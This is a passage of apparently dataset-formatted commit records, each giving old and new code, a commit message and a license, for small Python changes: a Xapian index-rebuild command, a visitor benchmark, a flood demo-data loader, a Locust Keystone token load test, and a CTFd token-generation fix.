def handle_noargs(self, **options):
# This just calls update_index(), but it temporarily
# overrides the XAPIAN_INDEX path to a path in /tmp.
#
# This avoids NFS locking during the Xapian index process.
old_xapian_path = django.conf.settings.HAYSTACK_XAPIAN_PATH
if old_xapian_path.endswith('/'):
old_xapian_path = old_xapian_path[:-1]
tmpdir = tempfile.mkdtemp(dir='/tmp/')
django.conf.settings.HAYSTACK_XAPIAN_PATH = tmpdir
cmd = haystack.management.commands.update_index.Command()
cmd.handle()
# If we get this far, move the tmpdir to the real path
new_path = old_xapian_path + ('.tmp.%d' % os.getpid())
assert not os.path.exists(new_path)
shutil.move(tmpdir, new_path)
os.rename(old_xapian_path, old_xapian_path + '.old')
os.rename(new_path, old_xapian_path)
shutil.rmtree(old_xapian_path + '.old')
|
Add new management command for updating the search index
|
Add new management command for updating the search index
This management command does the work in /tmp rather than in the real XAPIAN_INDEX.
|
Python
|
agpl-3.0
|
pculture/mirocommunity,pculture/mirocommunity,pculture/mirocommunity,pculture/mirocommunity
|
Add new management command for updating the search index
This management command does the work in /tmp rather than in the real XAPIAN_INDEX.
|
# This file is part of Miro Community.
# Copyright (C) 2011 Participatory Culture Foundation
#
# Miro Community is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# Miro Community is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Miro Community. If not, see <http://www.gnu.org/licenses/>.
import tempfile
import os
import shutil
import django.conf
from django.core.management.base import NoArgsCommand
import haystack.management.commands.update_index
class Command(NoArgsCommand):
args = ''
def handle_noargs(self, **options):
# This just calls update_index(), but it temporarily
# overrides the XAPIAN_INDEX path to a path in /tmp.
#
# This avoids NFS locking during the Xapian index process.
old_xapian_path = django.conf.settings.HAYSTACK_XAPIAN_PATH
if old_xapian_path.endswith('/'):
old_xapian_path = old_xapian_path[:-1]
tmpdir = tempfile.mkdtemp(dir='/tmp/')
django.conf.settings.HAYSTACK_XAPIAN_PATH = tmpdir
cmd = haystack.management.commands.update_index.Command()
cmd.handle()
# If we get this far, move the tmpdir to the real path
new_path = old_xapian_path + ('.tmp.%d' % os.getpid())
assert not os.path.exists(new_path)
shutil.move(tmpdir, new_path)
os.rename(old_xapian_path, old_xapian_path + '.old')
os.rename(new_path, old_xapian_path)
shutil.rmtree(old_xapian_path + '.old')
|
<commit_before><commit_msg>Add new management command for updating the search index
This management command does the work in /tmp rather than in the real XAPIAN_INDEX.<commit_after>
|
# This file is part of Miro Community.
# Copyright (C) 2011 Participatory Culture Foundation
#
# Miro Community is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# Miro Community is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Miro Community. If not, see <http://www.gnu.org/licenses/>.
import tempfile
import os
import shutil
import django.conf
from django.core.management.base import NoArgsCommand
import haystack.management.commands.update_index
class Command(NoArgsCommand):
args = ''
def handle_noargs(self, **options):
# This just calls update_index(), but it temporarily
# overrides the XAPIAN_INDEX path to a path in /tmp.
#
# This avoids NFS locking during the Xapian index process.
old_xapian_path = django.conf.settings.HAYSTACK_XAPIAN_PATH
if old_xapian_path.endswith('/'):
old_xapian_path = old_xapian_path[:-1]
tmpdir = tempfile.mkdtemp(dir='/tmp/')
django.conf.settings.HAYSTACK_XAPIAN_PATH = tmpdir
cmd = haystack.management.commands.update_index.Command()
cmd.handle()
# If we get this far, move the tmpdir to the real path
new_path = old_xapian_path + ('.tmp.%d' % os.getpid())
assert not os.path.exists(new_path)
shutil.move(tmpdir, new_path)
os.rename(old_xapian_path, old_xapian_path + '.old')
os.rename(new_path, old_xapian_path)
shutil.rmtree(old_xapian_path + '.old')
|
Add new management command for updating the search index
This management command does the work in /tmp rather than in the real XAPIAN_INDEX.# This file is part of Miro Community.
# Copyright (C) 2011 Participatory Culture Foundation
#
# Miro Community is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# Miro Community is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Miro Community. If not, see <http://www.gnu.org/licenses/>.
import tempfile
import os
import shutil
import django.conf
from django.core.management.base import NoArgsCommand
import haystack.management.commands.update_index
class Command(NoArgsCommand):
args = ''
def handle_noargs(self, **options):
# This just calls update_index(), but it temporarily
# overrides the XAPIAN_INDEX path to a path in /tmp.
#
# This avoids NFS locking during the Xapian index process.
old_xapian_path = django.conf.settings.HAYSTACK_XAPIAN_PATH
if old_xapian_path.endswith('/'):
old_xapian_path = old_xapian_path[:-1]
tmpdir = tempfile.mkdtemp(dir='/tmp/')
django.conf.settings.HAYSTACK_XAPIAN_PATH = tmpdir
cmd = haystack.management.commands.update_index.Command()
cmd.handle()
# If we get this far, move the tmpdir to the real path
new_path = old_xapian_path + ('.tmp.%d' % os.getpid())
assert not os.path.exists(new_path)
shutil.move(tmpdir, new_path)
os.rename(old_xapian_path, old_xapian_path + '.old')
os.rename(new_path, old_xapian_path)
shutil.rmtree(old_xapian_path + '.old')
|
<commit_before><commit_msg>Add new management command for updating the search index
This management command does the work in /tmp rather than in the real XAPIAN_INDEX.<commit_after># This file is part of Miro Community.
# Copyright (C) 2011 Participatory Culture Foundation
#
# Miro Community is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# Miro Community is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Miro Community. If not, see <http://www.gnu.org/licenses/>.
import tempfile
import os
import shutil
import django.conf
from django.core.management.base import NoArgsCommand
import haystack.management.commands.update_index
class Command(NoArgsCommand):
args = ''
def handle_noargs(self, **options):
# This just calls update_index(), but it temporarily
# overrides the XAPIAN_INDEX path to a path in /tmp.
#
# This avoids NFS locking during the Xapian index process.
old_xapian_path = django.conf.settings.HAYSTACK_XAPIAN_PATH
if old_xapian_path.endswith('/'):
old_xapian_path = old_xapian_path[:-1]
tmpdir = tempfile.mkdtemp(dir='/tmp/')
django.conf.settings.HAYSTACK_XAPIAN_PATH = tmpdir
cmd = haystack.management.commands.update_index.Command()
cmd.handle()
# If we get this far, move the tmpdir to the real path
new_path = old_xapian_path + ('.tmp.%d' % os.getpid())
assert not os.path.exists(new_path)
shutil.move(tmpdir, new_path)
os.rename(old_xapian_path, old_xapian_path + '.old')
os.rename(new_path, old_xapian_path)
shutil.rmtree(old_xapian_path + '.old')
|
|
6b7497f2c2c11d3a805cc6d2a26eedcc47f68e6c
|
tests/asttools/test_visitor.py
|
tests/asttools/test_visitor.py
|
"""Test suite for asttools.visitor."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import ast
import functools
import timeit
import os
import pytest
from pycc.asttools import parse
from pycc.asttools import visitor
@pytest.fixture
def big_ast():
"""Generate a large AST."""
# Trickery to get the path of a near-by file.
file_path = os.path.join(
os.path.dirname(
os.path.realpath(__file__)
),
'test_name.py',
)
with open(file_path, 'r') as source_file:
node = parse.parse(source_file.read())
# Duplicate the body several times.
for x in range(5):
node.body.extend(node.body)
return node
def test_visitor_out_performs_original(big_ast):
"""Ensure the non-recursive implementation is at least 2x faster."""
samples = 100
original_visitor = ast.NodeVisitor()
original_time = timeit.timeit(
functools.partial(
original_visitor.visit,
big_ast,
),
number=samples,
)
custom_visitor = visitor.NodeVisitor(big_ast)
custom_time = timeit.timeit(
custom_visitor.visit,
number=samples,
)
avg_time = (original_time + custom_time) / 2
diff_time = original_time - custom_time
pct_diff = (diff_time / avg_time) * 100
assert pct_diff > 100
|
Add small test/benchmark for asttools.visitor
|
Add small test/benchmark for asttools.visitor
This test ensures that the non-recursive implementation of the
NodeVisitor is faster at processing large AST's than the standard
implementation.
Signed-off-by: Kevin Conway <3473c1f185ca03eadc40ad288d84425b54fd7d57@gmail.com>
|
Python
|
apache-2.0
|
kevinconway/pycc,kevinconway/pycc
|
Add small test/benchmark for asttools.visitor
This test ensures that the non-recursive implementation of the
NodeVisitor is faster at processing large AST's than the standard
implementation.
Signed-off-by: Kevin Conway <3473c1f185ca03eadc40ad288d84425b54fd7d57@gmail.com>
|
"""Test suite for asttools.visitor."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import ast
import functools
import timeit
import os
import pytest
from pycc.asttools import parse
from pycc.asttools import visitor
@pytest.fixture
def big_ast():
"""Generate a large AST."""
# Trickery to get the path of a near-by file.
file_path = os.path.join(
os.path.dirname(
os.path.realpath(__file__)
),
'test_name.py',
)
with open(file_path, 'r') as source_file:
node = parse.parse(source_file.read())
# Duplicate the body several times.
for x in range(5):
node.body.extend(node.body)
return node
def test_visitor_out_performs_original(big_ast):
"""Ensure the non-recursive implementation is at least 2x faster."""
samples = 100
original_visitor = ast.NodeVisitor()
original_time = timeit.timeit(
functools.partial(
original_visitor.visit,
big_ast,
),
number=samples,
)
custom_visitor = visitor.NodeVisitor(big_ast)
custom_time = timeit.timeit(
custom_visitor.visit,
number=samples,
)
avg_time = (original_time + custom_time) / 2
diff_time = original_time - custom_time
pct_diff = (diff_time / avg_time) * 100
assert pct_diff > 100
|
<commit_before><commit_msg>Add small test/benchmark for asttools.visitor
This test ensures that the non-recursive implementation of the
NodeVisitor is faster at processing large AST's than the standard
implementation.
Signed-off-by: Kevin Conway <3473c1f185ca03eadc40ad288d84425b54fd7d57@gmail.com><commit_after>
|
"""Test suite for asttools.visitor."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import ast
import functools
import timeit
import os
import pytest
from pycc.asttools import parse
from pycc.asttools import visitor
@pytest.fixture
def big_ast():
"""Generate a large AST."""
# Trickery to get the path of a near-by file.
file_path = os.path.join(
os.path.dirname(
os.path.realpath(__file__)
),
'test_name.py',
)
with open(file_path, 'r') as source_file:
node = parse.parse(source_file.read())
# Duplicate the body several times.
for x in range(5):
node.body.extend(node.body)
return node
def test_visitor_out_performs_original(big_ast):
"""Ensure the non-recursive implementation is at least 2x faster."""
samples = 100
original_visitor = ast.NodeVisitor()
original_time = timeit.timeit(
functools.partial(
original_visitor.visit,
big_ast,
),
number=samples,
)
custom_visitor = visitor.NodeVisitor(big_ast)
custom_time = timeit.timeit(
custom_visitor.visit,
number=samples,
)
avg_time = (original_time + custom_time) / 2
diff_time = original_time - custom_time
pct_diff = (diff_time / avg_time) * 100
assert pct_diff > 100
|
Add small test/benchmark for asttools.visitor
This test ensures that the non-recursive implementation of the
NodeVisitor is faster at processing large AST's than the standard
implementation.
Signed-off-by: Kevin Conway <3473c1f185ca03eadc40ad288d84425b54fd7d57@gmail.com>"""Test suite for asttools.visitor."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import ast
import functools
import timeit
import os
import pytest
from pycc.asttools import parse
from pycc.asttools import visitor
@pytest.fixture
def big_ast():
"""Generate a large AST."""
# Trickery to get the path of a near-by file.
file_path = os.path.join(
os.path.dirname(
os.path.realpath(__file__)
),
'test_name.py',
)
with open(file_path, 'r') as source_file:
node = parse.parse(source_file.read())
# Duplicate the body several times.
for x in range(5):
node.body.extend(node.body)
return node
def test_visitor_out_performs_original(big_ast):
"""Ensure the non-recursive implementation is at least 2x faster."""
samples = 100
original_visitor = ast.NodeVisitor()
original_time = timeit.timeit(
functools.partial(
original_visitor.visit,
big_ast,
),
number=samples,
)
custom_visitor = visitor.NodeVisitor(big_ast)
custom_time = timeit.timeit(
custom_visitor.visit,
number=samples,
)
avg_time = (original_time + custom_time) / 2
diff_time = original_time - custom_time
pct_diff = (diff_time / avg_time) * 100
assert pct_diff > 100
|
<commit_before><commit_msg>Add small test/benchmark for asttools.visitor
This test ensures that the non-recursive implementation of the
NodeVisitor is faster at processing large AST's than the standard
implementation.
Signed-off-by: Kevin Conway <3473c1f185ca03eadc40ad288d84425b54fd7d57@gmail.com><commit_after>"""Test suite for asttools.visitor."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import ast
import functools
import timeit
import os
import pytest
from pycc.asttools import parse
from pycc.asttools import visitor
@pytest.fixture
def big_ast():
"""Generate a large AST."""
# Trickery to get the path of a near-by file.
file_path = os.path.join(
os.path.dirname(
os.path.realpath(__file__)
),
'test_name.py',
)
with open(file_path, 'r') as source_file:
node = parse.parse(source_file.read())
# Duplicate the body several times.
for x in range(5):
node.body.extend(node.body)
return node
def test_visitor_out_performs_original(big_ast):
"""Ensure the non-recursive implementation is at least 2x faster."""
samples = 100
original_visitor = ast.NodeVisitor()
original_time = timeit.timeit(
functools.partial(
original_visitor.visit,
big_ast,
),
number=samples,
)
custom_visitor = visitor.NodeVisitor(big_ast)
custom_time = timeit.timeit(
custom_visitor.visit,
number=samples,
)
avg_time = (original_time + custom_time) / 2
diff_time = original_time - custom_time
pct_diff = (diff_time / avg_time) * 100
assert pct_diff > 100
|
|
ada67d87d6afca677bbc3daae3329c83754d6e55
|
django_project/realtime/management/commands/loadfloodtestdata.py
|
django_project/realtime/management/commands/loadfloodtestdata.py
|
# coding=utf-8
from django.core.management.base import BaseCommand
from realtime.tasks.test.test_realtime_tasks import flood_layer_uri
from realtime.tasks.realtime.flood import process_flood
class Command(BaseCommand):
"""Script to load flood test data for demo purpose only.
"""
help = 'Script to load flood test data for demo purpose only.'
def handle(self, *args, **options):
flood_id = '2018022511-6-rw'
print 'Send flood data to InaSAFE Django with flood id = %s' % flood_id
process_flood.delay(
flood_id=flood_id,
data_source='hazard_file',
data_source_args={
'filename': flood_layer_uri
}
)
|
Add command to load flood test data for demo purpose.
|
Add command to load flood test data for demo purpose.
|
Python
|
bsd-2-clause
|
AIFDR/inasafe-django,AIFDR/inasafe-django,AIFDR/inasafe-django,AIFDR/inasafe-django
|
Add command to load flood test data for demo purpose.
|
# coding=utf-8
from django.core.management.base import BaseCommand
from realtime.tasks.test.test_realtime_tasks import flood_layer_uri
from realtime.tasks.realtime.flood import process_flood
class Command(BaseCommand):
"""Script to load flood test data for demo purpose only.
"""
help = 'Script to load flood test data for demo purpose only.'
def handle(self, *args, **options):
flood_id = '2018022511-6-rw'
print 'Send flood data to InaSAFE Django with flood id = %s' % flood_id
process_flood.delay(
flood_id=flood_id,
data_source='hazard_file',
data_source_args={
'filename': flood_layer_uri
}
)
|
<commit_before><commit_msg>Add command to load flood test data for demo purpose.<commit_after>
|
# coding=utf-8
from django.core.management.base import BaseCommand
from realtime.tasks.test.test_realtime_tasks import flood_layer_uri
from realtime.tasks.realtime.flood import process_flood
class Command(BaseCommand):
"""Script to load flood test data for demo purpose only.
"""
help = 'Script to load flood test data for demo purpose only.'
def handle(self, *args, **options):
flood_id = '2018022511-6-rw'
print 'Send flood data to InaSAFE Django with flood id = %s' % flood_id
process_flood.delay(
flood_id=flood_id,
data_source='hazard_file',
data_source_args={
'filename': flood_layer_uri
}
)
|
Add command to load flood test data for demo purpose.# coding=utf-8
from django.core.management.base import BaseCommand
from realtime.tasks.test.test_realtime_tasks import flood_layer_uri
from realtime.tasks.realtime.flood import process_flood
class Command(BaseCommand):
"""Script to load flood test data for demo purpose only.
"""
help = 'Script to load flood test data for demo purpose only.'
def handle(self, *args, **options):
flood_id = '2018022511-6-rw'
print 'Send flood data to InaSAFE Django with flood id = %s' % flood_id
process_flood.delay(
flood_id=flood_id,
data_source='hazard_file',
data_source_args={
'filename': flood_layer_uri
}
)
|
<commit_before><commit_msg>Add command to load flood test data for demo purpose.<commit_after># coding=utf-8
from django.core.management.base import BaseCommand
from realtime.tasks.test.test_realtime_tasks import flood_layer_uri
from realtime.tasks.realtime.flood import process_flood
class Command(BaseCommand):
"""Script to load flood test data for demo purpose only.
"""
help = 'Script to load flood test data for demo purpose only.'
def handle(self, *args, **options):
flood_id = '2018022511-6-rw'
print 'Send flood data to InaSAFE Django with flood id = %s' % flood_id
process_flood.delay(
flood_id=flood_id,
data_source='hazard_file',
data_source_args={
'filename': flood_layer_uri
}
)
|
|
6b7a8b4cc6552a9558e1c0cc0686aa1a347555e3
|
thinc/tests/unit/test_about.py
|
thinc/tests/unit/test_about.py
|
'''Test that about.py imports correctly and has expected attributes.'''
from ... import about
def test_about_attrs():
about.__name__
about.__version__
about.__summary__
about.__uri__
about.__author__
about.__email__
about.__license__
about.__title__
about.__release__
|
Add tests for about module
|
Add tests for about module
|
Python
|
mit
|
spacy-io/thinc,explosion/thinc,explosion/thinc,spacy-io/thinc,spacy-io/thinc,explosion/thinc,explosion/thinc
|
Add tests for about module
|
'''Test that about.py imports correctly and has expected attributes.'''
from ... import about
def test_about_attrs():
about.__name__
about.__version__
about.__summary__
about.__uri__
about.__author__
about.__email__
about.__license__
about.__title__
about.__release__
|
<commit_before><commit_msg>Add tests for about module<commit_after>
|
'''Test that about.py imports correctly and has expected attributes.'''
from ... import about
def test_about_attrs():
about.__name__
about.__version__
about.__summary__
about.__uri__
about.__author__
about.__email__
about.__license__
about.__title__
about.__release__
|
Add tests for about module'''Test that about.py imports correctly and has expected attributes.'''
from ... import about
def test_about_attrs():
about.__name__
about.__version__
about.__summary__
about.__uri__
about.__author__
about.__email__
about.__license__
about.__title__
about.__release__
|
<commit_before><commit_msg>Add tests for about module<commit_after>'''Test that about.py imports correctly and has expected attributes.'''
from ... import about
def test_about_attrs():
about.__name__
about.__version__
about.__summary__
about.__uri__
about.__author__
about.__email__
about.__license__
about.__title__
about.__release__
|
|
67097201c27f0951c44be9a6b6956a5b7ac4aa5c
|
keystone_performance/auth_validate_multiple_endpoints/locustfile.py
|
keystone_performance/auth_validate_multiple_endpoints/locustfile.py
|
from time import sleep
import locust
import json
class Authenticate(locust.TaskSet):
@locust.task
def authenticate(self):
# Set header information and path
headers = {'content-type': 'application/json'}
path = '/v3/auth/tokens'
# Build authentication request with an existing user. This will be
# an unscoped token request.
request = {
'auth': {
'identity': {
'methods': [
'password'
],
'password': {
'user': {
'id': '9fff846eb28442418612b94fccda9264',
'password': 'sup3rs3cr3t'
}
}
}
}
}
# Since this is a python-request object handed to us on HttpLocust()
# object initialization, we can pass extra stuff if necessary using
# kwargs. Call to POST `/v3/auth/tokens` and capture the response
# object.
response = self.client.post(path, data=json.dumps(request),
headers=headers)
# If we know we can pull a token out of the `X-Subject-Token` header,
# then proceed with the test plan and immediately attempt to validate
# the token several times. Here we are trying to see if we can get
# Keystone to throw a 404.
if response.status_code == 201:
token = response.headers['X-Subject-Token']
# TODO(lbragstad): Turn this test case into one that supports
# generating an admin token with an admin user, instead of using
# auth_token.
admin_token = 'ADMIN'
headers = {'X-Subject-Token': token,
'X-Auth-Token': admin_token}
for i in range(5):
response = self.client.get(path, headers=headers)
class KeystoneUser(locust.HttpLocust):
task_set = Authenticate
# NOTE(lbragstad): Make this a list of endpoints. Also find a way to pass
# in these endpoints to the scripts instead of having to modify the test
# everytime the endpoint changes.
host = ['http://<api_haproxy_ip>:<port>']
min_wait=1000
max_wait=1000
|
Add multiple endpoint auth and validate test plan
|
Add multiple endpoint auth and validate test plan
|
Python
|
apache-2.0
|
lbragstad/locust-scripts
|
Add multiple endpoint auth and validate test plan
|
from time import sleep
import locust
import json
class Authenticate(locust.TaskSet):
@locust.task
def authenticate(self):
# Set header information and path
headers = {'content-type': 'application/json'}
path = '/v3/auth/tokens'
# Build authentication request with an existing user. This will be
# an unscoped token request.
request = {
'auth': {
'identity': {
'methods': [
'password'
],
'password': {
'user': {
'id': '9fff846eb28442418612b94fccda9264',
'password': 'sup3rs3cr3t'
}
}
}
}
}
# Since this is a python-request object handed to us on HttpLocust()
# object initialization, we can pass extra stuff if necessary using
# kwargs. Call to POST `/v3/auth/tokens` and capture the response
# object.
response = self.client.post(path, data=json.dumps(request),
headers=headers)
# If we know we can pull a token out of the `X-Subject-Token` header,
# then proceed with the test plan and immediately attempt to validate
# the token several times. Here we are trying to see if we can get
# Keystone to throw a 404.
if response.status_code == 201:
token = response.headers['X-Subject-Token']
# TODO(lbragstad): Turn this test case into one that supports
# generating an admin token with an admin user, instead of using
# auth_token.
admin_token = 'ADMIN'
headers = {'X-Subject-Token': token,
'X-Auth-Token': admin_token}
for i in range(5):
response = self.client.get(path, headers=headers)
class KeystoneUser(locust.HttpLocust):
task_set = Authenticate
# NOTE(lbragstad): Make this a list of endpoints. Also find a way to pass
# in these endpoints to the scripts instead of having to modify the test
# everytime the endpoint changes.
host = ['http://<api_haproxy_ip>:<port>']
min_wait=1000
max_wait=1000
|
<commit_before><commit_msg>Add multiple endpoint auth and validate test plan<commit_after>
|
from time import sleep
import locust
import json
class Authenticate(locust.TaskSet):
@locust.task
def authenticate(self):
# Set header information and path
headers = {'content-type': 'application/json'}
path = '/v3/auth/tokens'
# Build authentication request with an existing user. This will be
# an unscoped token request.
request = {
'auth': {
'identity': {
'methods': [
'password'
],
'password': {
'user': {
'id': '9fff846eb28442418612b94fccda9264',
'password': 'sup3rs3cr3t'
}
}
}
}
}
# Since this is a python-request object handed to us on HttpLocust()
# object initialization, we can pass extra stuff if necessary using
# kwargs. Call to POST `/v3/auth/tokens` and capture the response
# object.
response = self.client.post(path, data=json.dumps(request),
headers=headers)
# If we know we can pull a token out of the `X-Subject-Token` header,
# then proceed with the test plan and immediately attempt to validate
# the token several times. Here we are trying to see if we can get
# Keystone to throw a 404.
if response.status_code == 201:
token = response.headers['X-Subject-Token']
# TODO(lbragstad): Turn this test case into one that supports
# generating an admin token with an admin user, instead of using
# auth_token.
admin_token = 'ADMIN'
headers = {'X-Subject-Token': token,
'X-Auth-Token': admin_token}
for i in range(5):
response = self.client.get(path, headers=headers)
class KeystoneUser(locust.HttpLocust):
task_set = Authenticate
# NOTE(lbragstad): Make this a list of endpoints. Also find a way to pass
# in these endpoints to the scripts instead of having to modify the test
# everytime the endpoint changes.
host = ['http://<api_haproxy_ip>:<port>']
min_wait=1000
max_wait=1000
|
Add multiple endpoint auth and validate test planfrom time import sleep
import locust
import json
class Authenticate(locust.TaskSet):
@locust.task
def authenticate(self):
# Set header information and path
headers = {'content-type': 'application/json'}
path = '/v3/auth/tokens'
# Build authentication request with an existing user. This will be
# an unscoped token request.
request = {
'auth': {
'identity': {
'methods': [
'password'
],
'password': {
'user': {
'id': '9fff846eb28442418612b94fccda9264',
'password': 'sup3rs3cr3t'
}
}
}
}
}
# Since this is a python-request object handed to us on HttpLocust()
# object initialization, we can pass extra stuff if necessary using
# kwargs. Call to POST `/v3/auth/tokens` and capture the response
# object.
response = self.client.post(path, data=json.dumps(request),
headers=headers)
# If we know we can pull a token out of the `X-Subject-Token` header,
# then proceed with the test plan and immediately attempt to validate
# the token several times. Here we are trying to see if we can get
# Keystone to throw a 404.
if response.status_code == 201:
token = response.headers['X-Subject-Token']
# TODO(lbragstad): Turn this test case into one that supports
# generating an admin token with an admin user, instead of using
# auth_token.
admin_token = 'ADMIN'
headers = {'X-Subject-Token': token,
'X-Auth-Token': admin_token}
for i in range(5):
response = self.client.get(path, headers=headers)
class KeystoneUser(locust.HttpLocust):
task_set = Authenticate
# NOTE(lbragstad): Make this a list of endpoints. Also find a way to pass
# in these endpoints to the scripts instead of having to modify the test
# everytime the endpoint changes.
host = ['http://<api_haproxy_ip>:<port>']
min_wait=1000
max_wait=1000
|
<commit_before><commit_msg>Add multiple endpoint auth and validate test plan<commit_after>from time import sleep
import locust
import json
class Authenticate(locust.TaskSet):
@locust.task
def authenticate(self):
# Set header information and path
headers = {'content-type': 'application/json'}
path = '/v3/auth/tokens'
# Build authentication request with an existing user. This will be
# an unscoped token request.
request = {
'auth': {
'identity': {
'methods': [
'password'
],
'password': {
'user': {
'id': '9fff846eb28442418612b94fccda9264',
'password': 'sup3rs3cr3t'
}
}
}
}
}
# Since this is a python-request object handed to us on HttpLocust()
# object initialization, we can pass extra stuff if necessary using
# kwargs. Call to POST `/v3/auth/tokens` and capture the response
# object.
response = self.client.post(path, data=json.dumps(request),
headers=headers)
# If we know we can pull a token out of the `X-Subject-Token` header,
# then proceed with the test plan and immediately attempt to validate
# the token several times. Here we are trying to see if we can get
# Keystone to throw a 404.
if response.status_code == 201:
token = response.headers['X-Subject-Token']
# TODO(lbragstad): Turn this test case into one that supports
# generating an admin token with an admin user, instead of using
# auth_token.
admin_token = 'ADMIN'
headers = {'X-Subject-Token': token,
'X-Auth-Token': admin_token}
for i in range(5):
response = self.client.get(path, headers=headers)
class KeystoneUser(locust.HttpLocust):
task_set = Authenticate
# NOTE(lbragstad): Make this a list of endpoints. Also find a way to pass
# in these endpoints to the scripts instead of having to modify the test
# everytime the endpoint changes.
host = ['http://<api_haproxy_ip>:<port>']
min_wait=1000
max_wait=1000
|
|
740ea36f7a06989f872150afa91472e3e2c34a03
|
CTFd/utils/security/auth.py
|
CTFd/utils/security/auth.py
|
import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=hexencode(os.urandom(32))
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
|
import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=value
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
|
Fix tokens using too-random of a value
|
Fix tokens using too-random of a value
|
Python
|
apache-2.0
|
isislab/CTFd,CTFd/CTFd,isislab/CTFd,CTFd/CTFd,ajvpot/CTFd,isislab/CTFd,LosFuzzys/CTFd,ajvpot/CTFd,LosFuzzys/CTFd,CTFd/CTFd,ajvpot/CTFd,LosFuzzys/CTFd,isislab/CTFd,ajvpot/CTFd,LosFuzzys/CTFd,CTFd/CTFd
|
import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=hexencode(os.urandom(32))
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
Fix tokens using too-random of a value
|
import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=value
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
|
<commit_before>import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
